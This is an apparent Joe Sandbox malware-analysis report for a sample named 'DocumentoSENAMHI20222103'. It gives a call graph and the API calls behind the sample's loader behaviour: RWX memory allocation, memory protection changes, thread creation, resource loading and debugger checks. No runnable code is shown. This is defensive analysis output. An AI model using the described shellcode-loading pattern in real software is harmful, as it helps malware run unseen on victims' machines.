10184->10220 10188 bd7188 14 API calls 10187->10188 10189 bd3d1b 10188->10189 10189->10144 10191 bd403c 5 API calls 10190->10191 10192 be01de 10191->10192 10192->10192 10194 bd10b7 10193->10194 10195 bd5d44 RaiseException 10194->10195 10196 bd10c4 10195->10196 10216 bd29f4 10197->10216 10198 bd2c43 10293 be01c5 10198->10293 10201 bd2a44 CoTaskMemFree 10201->10198 10203 bd2b7a CharNextA 10205 bd18a6 27 API calls 10203->10205 10204 bd2b6a CharNextA 10204->10216 10205->10216 10208 bd2ae5 CharNextA 10210 bd2af6 CharNextA CharNextA 10208->10210 10208->10216 10209 bd2b94 CharNextA 10209->10201 10209->10216 10271 bd18a6 10210->10271 10211 bd2a93 CharNextA CharNextA CharNextA CharNextA 10259 bd1928 10211->10259 10215 bd1928 29 API calls 10215->10216 10216->10198 10216->10201 10216->10203 10216->10204 10216->10208 10216->10209 10216->10211 10216->10215 10217 bd1285 RaiseException 10216->10217 10219 bd2c0b CharNextA 10216->10219 10256 bd772c 10216->10256 10279 bd22d6 10216->10279 10283 bd770f 10216->10283 10286 bd2199 EnterCriticalSection 10216->10286 10217->10216 10219->10216 10221 bd2dbb 10220->10221 10355 bd2327 10221->10355 10223 bd33e4 10224 bd403c 5 API calls 10223->10224 10225 bd33fe 10224->10225 10225->10180 10226 bd2e16 lstrcmpiA lstrcmpiA 10238 bd2e07 10226->10238 10227 bd33dd RegCloseKey 10227->10223 10228 bd2f0b lstrcmpiA 10229 bd2f37 lstrcmpiA 10228->10229 10228->10238 10229->10238 10230 bd22d6 CharNextA 10230->10238 10231 bd2919 lstrcmpiA 10231->10238 10232 bd770f 37 API calls 10232->10238 10233 bd2327 7 API calls 10233->10238 10234 bd1285 RaiseException 10234->10238 10235 bd3107 RegCreateKeyExA 10235->10238 10236 bd297d 12 API calls 10236->10238 10237 bd1629 GetModuleHandleA GetProcAddress RegOpenKeyExA RegCloseKey RegOpenKeyExA 10237->10238 10238->10223 10238->10226 10238->10228 10238->10229 10238->10230 10238->10231 10238->10232 10238->10233 10238->10234 10238->10235 10238->10236 10238->10237 10240 bd33b4 10238->10240 10241 bd3032 RegDeleteValueA 10238->10241 10242 bd2440 42 API calls 10238->10242 10243 bd3126 RegCloseKey 10238->10243 10244 bd3057 RegCloseKey 10238->10244 10245 bd3150 10238->10245 10247 bd2948 RegQueryInfoKeyW 10238->10247 10248 bd2da0 80 API calls 10238->10248 10249 bd3340 RegCloseKey 10238->10249 10251 bd1685 19 API calls 10238->10251 10368 bd1348 10238->10368 10374 bd1596 10238->10374 10240->10245 10246 bd33c6 RegCloseKey 10240->10246 10241->10238 10242->10238 10243->10238 10244->10238 10245->10223 10245->10227 10246->10245 10247->10238 10248->10238 10249->10238 10251->10238 10253 bd2301 10252->10253 10254 bd231a CharNextA 10253->10254 10255 bd2325 10253->10255 10254->10253 10255->10183 10296 bd7743 10256->10296 10258 bd773e 10258->10216 10264 bd1934 10259->10264 10260 be01c5 5 API calls 10261 bd19e8 10260->10261 10261->10216 10262 bd7188 14 API calls 10265 bd19bf 10262->10265 10264->10265 10266 bd1984 10264->10266 10267 bd193d 10264->10267 10303 bd3cd7 10264->10303 10265->10262 10265->10267 10310 bd1251 10266->10310 10267->10260 10269 bd19a8 10269->10265 10270 bd18a6 27 API calls 10269->10270 10270->10265 10272 bd18b9 10271->10272 10278 bd190d 10271->10278 10273 bd18d4 CoTaskMemRealloc 10272->10273 10274 bd18e2 10272->10274 10272->10278 10273->10274 10273->10278 10275 bd1105 25 API calls 10274->10275 10274->10278 10276 bd1907 10275->10276 10277 bd1285 RaiseException 10276->10277 10277->10278 10278->10216 10280 bd22e4 10279->10280 10281 bd22e2 10279->10281 10280->10281 10282 bd22e8 CharNextA 10280->10282 10281->10216 10282->10280 10321 bd9bb0 10283->10321 10287 bd21bb lstrcmpiA 10286->10287 10288 bd21e4 LeaveCriticalSection 10286->10288 10289 bd21cd 10287->10289 10290 bd21d5 10287->10290 10288->10216 10289->10287 10291 bd21d3 10289->10291 10290->10288 10349 bd3c05 10290->10349 10291->10288 10294 bd403c 5 API calls 10293->10294 10295 bd2c4d 10294->10295 10295->10183 10297 bd70e3 37 API calls 10296->10297 10298 bd7759 10297->10298 10299 bd75d4 14 API calls 10298->10299 10302 bd7763 10298->10302 10300 bd7797 10299->10300 10301 bd748c 25 API calls 10300->10301 10301->10302 10302->10258 10304 bd3d09 10303->10304 10305 bd3ce9 10303->10305 10306 bd10a9 RaiseException 10304->10306 10314 bd7832 10305->10314 10308 bd3d13 10306->10308 10311 bd125b 10310->10311 10313 bd127a 10310->10313 10312 bd125f WideCharToMultiByte 10311->10312 10311->10313 10312->10313 10313->10269 10319 bd8bbc 10314->10319 10315 bd8bfa 10316 bd75d4 14 API calls 10315->10316 10318 bd3cf2 10316->10318 10317 bd8be5 RtlAllocateHeap 10317->10318 10317->10319 10318->10266 10319->10315 10319->10317 10320 bd893e 2 API calls 10319->10320 10320->10319 10324 bd9bc4 10321->10324 10322 bd9bc8 10323 bd75d4 14 API calls 10322->10323 10339 bd7727 10322->10339 10325 bd9bf2 10323->10325 10324->10322 10326 bd9c02 10324->10326 10324->10339 10327 bd748c 25 API calls 10325->10327 10328 bd70e3 37 API calls 10326->10328 10327->10339 10329 bd9c0e 10328->10329 10330 bd9c18 10329->10330 10335 bd9c2f 10329->10335 10340 bdcb84 10330->10340 10332 bd9cb1 10334 bd75d4 14 API calls 10332->10334 10332->10339 10333 bd9d06 10336 bd75d4 14 API calls 10333->10336 10333->10339 10337 bd9cfa 10334->10337 10335->10332 10335->10333 10336->10339 10338 bd748c 25 API calls 10337->10338 10338->10339 10339->10216 10342 bdcad1 10340->10342 10341 bdcae9 10343 bdcafd 10341->10343 10344 bd75d4 14 API calls 10341->10344 10342->10341 10342->10343 10347 bdcb21 10342->10347 10343->10339 10345 bdcaf3 10344->10345 10346 bd748c 25 API calls 10345->10346 10346->10343 10347->10343 10348 bd75d4 14 API calls 10347->10348 10348->10345 10350 bd3c0f 10349->10350 10351 bd3c14 10350->10351 10354 bd1086 RaiseException 10350->10354 10351->10291 10353 bd3c2a 10354->10353 10356 bd22fe CharNextA 10355->10356 10357 bd2339 10356->10357 10358 bd2353 CharNextA 10357->10358 10359 bd242d 10357->10359 10360 bd23db 10357->10360 10361 bd23c9 10358->10361 10362 bd2364 10358->10362 10359->10238 10360->10359 10367 bd23f2 CharNextA 10360->10367 10361->10359 10363 bd23d0 CharNextA 10361->10363 10362->10359 10364 bd2369 CharNextA 10362->10364 10365 bd237d CharNextA 10362->10365 10366 bd2378 CharNextA 10362->10366 10363->10359 10364->10361 10364->10362 10365->10359 10365->10362 10366->10365 10367->10359 10367->10360 10369 bd1355 GetModuleHandleA 10368->10369 10370 bd1390 10368->10370 10372 bd1374 10369->10372 10373 bd1364 GetProcAddress 10369->10373 10371 bd1395 RegCreateKeyExA 10370->10371 10370->10372 10371->10372 10372->10238 10373->10372 10375 bd15af 10374->10375 10376 bd15a3 10374->10376 10377 bd15b8 GetModuleHandleA 10375->10377 10379 bd15da 10375->10379 10383 bd13bb 10376->10383 10377->10379 10380 bd15c7 GetProcAddress 10377->10380 10381 bd15ad 10379->10381 10382 bd15ff RegDeleteKeyA 10379->10382 10380->10379 10381->10238 10382->10381 10384 bd13c8 GetModuleHandleA 10383->10384 10385 bd13f6 10383->10385 10386 bd13d7 GetProcAddress 10384->10386 10388 bd13e7 10384->10388 10387 bd13fb RegDeleteKeyA 10385->10387 10385->10388 10386->10388 10387->10388 10388->10381 10412 bd44d7 10413 bd44df 10412->10413 10429 bd87b4 10413->10429 10415 bd44ea 10436 bd40fe 10415->10436 10417 bd4959 4 API calls 10419 bd4581 10417->10419 10418 bd44ff 10427 bd455c 10418->10427 10442 bd428b 10418->10442 10421 bd4518 10421->10427 10445 bd4c7c InitializeSListHead 10421->10445 10423 bd452e 10446 bd4c8b 10423->10446 10425 bd4551 10452 bd8891 10425->10452 10427->10417 10428 bd4579 10427->10428 10430 bd87e6 10429->10430 10431 bd87c3 10429->10431 10430->10415 10431->10430 10432 bd75d4 14 API calls 10431->10432 10433 bd87d6 10432->10433 10434 bd748c 25 API calls 10433->10434 10435 bd87e1 10434->10435 10435->10415 10437 bd410e 10436->10437 10438 bd410a 10436->10438 10439 bd4959 4 API calls 10437->10439 10441 bd411b 10437->10441 10438->10418 10440 bd4184 10439->10440 10441->10418 10459 bd425e 10442->10459 10445->10423 10522 bd89c7 10446->10522 10448 bd4c9c 10449 bd4ca3 10448->10449 10450 bd4959 4 API calls 10448->10450 10449->10425 10451 bd4cab 10450->10451 10453 bd90a4 37 API calls 10452->10453 10455 bd889c 10453->10455 10454 bd88d4 10454->10427 10455->10454 10456 bd75d4 14 API calls 10455->10456 10457 bd88c9 10456->10457 10458 bd748c 25 API calls 10457->10458 10458->10454 10460 bd426d 10459->10460 10461 bd4274 10459->10461 10465 bd848f 10460->10465 10468 bd84fb 10461->10468 10464 bd4272 10464->10421 10466 bd84fb 28 API calls 10465->10466 10467 bd84a1 10466->10467 10467->10464 10471 bd8231 10468->10471 10472 bd823d 10471->10472 10479 bd9d97 EnterCriticalSection 10472->10479 10474 bd824b 10480 bd828c 10474->10480 10476 bd8258 10490 bd8280 10476->10490 10479->10474 10481 bd82a8 10480->10481 10484 bd831f 10480->10484 10482 bd82ff 10481->10482 10481->10484 10493 bd7273 10481->10493 10482->10484 10485 bd7273 28 API calls 10482->10485 10484->10476 10487 bd8315 10485->10487 10486 bd82f5 10489 bd8b82 14 API calls 10486->10489 10488 bd8b82 14 API calls 10487->10488 10488->10484 10489->10482 10521 bd9ddf LeaveCriticalSection 10490->10521 10492 bd8269 10492->10464 10494 bd729b 10493->10494 10495 bd7280 10493->10495 10500 bd72aa 10494->10500 10502 bd9b14 10494->10502 10495->10494 10496 bd728c 10495->10496 10497 bd75d4 14 API calls 10496->10497 10501 bd7291 10497->10501 10509 bd9b47 10500->10509 10501->10486 10503 bd9b1f 10502->10503 10504 bd9b34 HeapSize 10502->10504 10505 bd75d4 14 API calls 10503->10505 10504->10500 10506 bd9b24 10505->10506 10507 bd748c 25 API calls 10506->10507 10508 bd9b2f 10507->10508 10508->10500 10510 bd9b5f 10509->10510 10511 bd9b54 10509->10511 10513 bd9b67 10510->10513 10519 bd9b70 10510->10519 10512 bd8bbc 15 API calls 10511->10512 10518 bd9b5c 10512->10518 10514 bd8b82 14 API calls 10513->10514 10514->10518 10515 bd9b9a HeapReAlloc 10515->10518 10515->10519 10516 bd9b75 10517 bd75d4 14 API calls 10516->10517 10517->10518 10518->10501 10519->10515 10519->10516 10520 bd893e 2 API calls 10519->10520 10520->10519 10521->10492 10523 bd89e5 10522->10523 10527 bd8a05 10522->10527 10524 bd75d4 14 API calls 10523->10524 10525 bd89fb 10524->10525 10526 bd748c 25 API calls 10525->10526 10526->10527 10527->10448 10553 bdb2ca 10554 bdb2e3 10553->10554 10555 bdb301 10553->10555 10554->10555 10556 bd961d 30 API calls 10554->10556 10556->10554

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,00A00000,00003000,00000040), ref: 00BD3AF0
                                                                              • VirtualProtect.KERNEL32(76D4EC70,00000100,00000040,00000000), ref: 00BD3B0F
                                                                              • CreateThread.KERNEL32(00000000,00000000,76D4EC70,00000000,00000000,00000000), ref: 00BD3B46
                                                                              • MessageBoxA.USER32(00000000,rick,rick,00000002), ref: 00BD3B82
                                                                              • MessageBoxA.USER32(00000000,rick,rick,00000001), ref: 00BD3B99
                                                                              • Sleep.KERNEL32(00001388), ref: 00BD3BD5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: MessageVirtual$AllocCreateProtectSleepThread
                                                                              • String ID: rick
                                                                              • API String ID: 1205271519-868534032
                                                                              • Opcode ID: 5a1f5a8a309276e63ea08eed5313c1751a8cd41c6edb4474cf2127d9706f3ce7
                                                                              • Instruction ID: 34e6f4657c23128cd58185e18116fb30d1673fe7051237ecc96d5c944990de1e
                                                                              • Opcode Fuzzy Hash: 5a1f5a8a309276e63ea08eed5313c1751a8cd41c6edb4474cf2127d9706f3ce7
                                                                              • Instruction Fuzzy Hash: 8941C625E043C89AE7128FB88C81BEDFFB4AF2A700F145259EAC87F253DA605585C711
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00BDB23D
                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BDB2AB
                                                                                • Part of subcall function 00BDB146: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,00000000,00BDDE4D,0000FDE9,00000000,?,?,?,00BDDBC6,0000FDE9,00000000,?), ref: 00BDB1F2
                                                                                • Part of subcall function 00BD8BBC: RtlAllocateHeap.NTDLL(00000000,00BD3522,?,?,00BD3CF2,00BD352A,00000000,?,00BD3522,?), ref: 00BD8BEE
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide
                                                                              • String ID:
                                                                              • API String ID: 1109257800-0
                                                                              • Opcode ID: bfc8f83d2d736b6653606584178f8920dbf4c3e33d6ca7265b98f4e557b0aee1
                                                                              • Instruction ID: 9192bc4fc37a01fa3572f40bbcf7049351104a943e7288eb9f3731893c8ee70b
                                                                              • Opcode Fuzzy Hash: bfc8f83d2d736b6653606584178f8920dbf4c3e33d6ca7265b98f4e557b0aee1
                                                                              • Instruction Fuzzy Hash: 910184B3611256BB272156AB5CC9C7FEEEDCDC6BA531601ABB904D6301FF61CD0181B1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 33 bd9e27-bd9e32 34 bd9e34-bd9e3e 33->34 35 bd9e40-bd9e46 33->35 34->35 36 bd9e74-bd9e7f call bd75d4 34->36 37 bd9e5f-bd9e70 RtlAllocateHeap 35->37 38 bd9e48-bd9e49 35->38 42 bd9e81-bd9e83 36->42 39 bd9e4b-bd9e52 call bd88f3 37->39 40 bd9e72 37->40 38->37 39->36 46 bd9e54-bd9e5d call bd893e 39->46 40->42 46->36 46->37
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00BD9246,00000001,00000364,00000006,000000FF,?,?,?,00BD75D9,00BD116B), ref: 00BD9E68
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: f486a5276b90f24e938970fb5887a7ebe22da1e6d36c30a1e0d97cb2269d1067
                                                                              • Instruction ID: c938290af1e1c3070d6eacff20e2e804bb3560df4a68fe8daba676cbe12ce9c3
                                                                              • Opcode Fuzzy Hash: f486a5276b90f24e938970fb5887a7ebe22da1e6d36c30a1e0d97cb2269d1067
                                                                              • Instruction Fuzzy Hash: 01F0B43160422567DB219A669C01B9BF7C9EB81760B1442D3AC05D7381FE30DC0586E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 49 bd8bbc-bd8bc8 50 bd8bfa-bd8c05 call bd75d4 49->50 51 bd8bca-bd8bcc 49->51 58 bd8c07-bd8c09 50->58 53 bd8bce-bd8bcf 51->53 54 bd8be5-bd8bf6 RtlAllocateHeap 51->54 53->54 55 bd8bf8 54->55 56 bd8bd1-bd8bd8 call bd88f3 54->56 55->58 56->50 61 bd8bda-bd8be3 call bd893e 56->61 61->50 61->54
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000000,00BD3522,?,?,00BD3CF2,00BD352A,00000000,?,00BD3522,?), ref: 00BD8BEE
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: ea423ba3e340202908c0270021b0de316ce2814955e98898d13d7f7384199810
                                                                              • Instruction ID: 3a36f4dd492b6892390e813d8cb1b8c16bfdcdde11e051f45e1d9f83154e49c0
                                                                              • Opcode Fuzzy Hash: ea423ba3e340202908c0270021b0de316ce2814955e98898d13d7f7384199810
                                                                              • Instruction Fuzzy Hash: F2E06571606251A6D6212769DC01B9BF7C8EB917A3F1511E3AC0696390FE23CC0186B5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 64 bd3bdd-bd3be3 GetCommandLineA call bd3a86 66 bd3be8-bd3bee 64->66 67 bd3d14-bd3d1c call bd7188 66->67 68 bd3bf4 66->68 68->67
                                                                              APIs
                                                                              • GetCommandLineA.KERNEL32 ref: 00BD3BDD
                                                                                • Part of subcall function 00BD3A86: VirtualAlloc.KERNEL32(00000000,00A00000,00003000,00000040), ref: 00BD3AF0
                                                                                • Part of subcall function 00BD3A86: VirtualProtect.KERNEL32(76D4EC70,00000100,00000040,00000000), ref: 00BD3B0F
                                                                                • Part of subcall function 00BD3A86: CreateThread.KERNEL32(00000000,00000000,76D4EC70,00000000,00000000,00000000), ref: 00BD3B46
                                                                                • Part of subcall function 00BD3A86: MessageBoxA.USER32(00000000,rick,rick,00000002), ref: 00BD3B82
                                                                                • Part of subcall function 00BD3A86: MessageBoxA.USER32(00000000,rick,rick,00000001), ref: 00BD3B99
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: MessageVirtual$AllocCommandCreateLineProtectThread
                                                                              • String ID:
                                                                              • API String ID: 1227410803-0
                                                                              • Opcode ID: 54b196c5dfcc38a6a27af2756d91d7f60f4fd6bd25a52c75a8ae69656eff3e79
                                                                              • Instruction ID: 79283dab9e903907061ee9a11d0b8d19ee3fc5358d6daf8c937ff5f2cd5fb6a6
                                                                              • Opcode Fuzzy Hash: 54b196c5dfcc38a6a27af2756d91d7f60f4fd6bd25a52c75a8ae69656eff3e79
                                                                              • Instruction Fuzzy Hash: C2C00274055044AB8A096B28D845458B6E6AB5174A3B045FAE10249536FB364A56DE11
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000060,?,?,?,?,?), ref: 00BD1C0E
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 00BD1C29
                                                                              • FindResourceA.KERNEL32(00000000,?,?), ref: 00BD1C54
                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 00BD1C70
                                                                              • SizeofResource.KERNEL32(00000000,?), ref: 00BD1C87
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00BD1D48
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoadResource$FindFreeSizeof
                                                                              • String ID:
                                                                              • API String ID: 1621920845-0
                                                                              • Opcode ID: 586f13e02f36998e7d0d2d3ee5a3ce0ff8da176d7ad11420b71d40ade03e2e48
                                                                              • Instruction ID: 9c787a446f52d7a023022b78ab0799d81f23e0902bea061afea7aa59d398f027
                                                                              • Opcode Fuzzy Hash: 586f13e02f36998e7d0d2d3ee5a3ce0ff8da176d7ad11420b71d40ade03e2e48
                                                                              • Instruction Fuzzy Hash: 526100B5A40119ABCB219F588C817EDF7F6EF44300F5444EAE609A7351EB309EC58F65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00BD71CC
                                                                              • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00BD71E0
                                                                              • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,0000001C), ref: 00BD7230
                                                                              • VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,0000001C), ref: 00BD7245
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$AllocInfoProtectQuerySystem
                                                                              • String ID:
                                                                              • API String ID: 3562403962-0
                                                                              • Opcode ID: 6448d01aa08d9de6c58adf87859e069493eba0458cf8f0dcbf0a7cf4bfc1a1ea
                                                                              • Instruction ID: b555fa8e37f1a437d44987822f99a1597aceebe132577e39a39ca53fac484e64
                                                                              • Opcode Fuzzy Hash: 6448d01aa08d9de6c58adf87859e069493eba0458cf8f0dcbf0a7cf4bfc1a1ea
                                                                              • Instruction Fuzzy Hash: 6E21A372E40158ABCB20DFE98C85AEEFBF8EB45754B1004A6F915EB240FA7099048B90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00BD4965
                                                                              • IsDebuggerPresent.KERNEL32 ref: 00BD4A31
                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BD4A51
                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00BD4A5B
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.83498734792.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                                              • Associated: 00000001.00000002.83498623321.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83498928538.0000000000BE1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499032602.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83499090756.0000000000BEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500642344.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000001.00000002.83500678644.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_bd0000_DocumentoSENAMHI20222103.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                              • String ID:
                                                                              • API String ID: 254469556-0
                                                                              • Opcode ID: c81baa70bf8580eb72e31cd36443c876d796b3bee5881d0d8447dd45e5222d73
                                                                              • Instruction ID: a5b2930a6916b377c37cd87aab13e152a595330e92c3c4e8b3087062097f514e
                                                                              • Opcode Fuzzy Hash: c81baa70bf8580eb72e31cd36443c876d796b3bee5881d0d8447dd45e5222d73
                                                                              • Instruction Fuzzy Hash: E1311675D412189BDB20DFA4D989BCDBBF8AF08300F1041EAE50DAB250EB709A84CF44
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00BD4BF0
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BD4BFF
                                                                              • GetCurrentProcessId.KERNEL32 ref: 00BD4C08
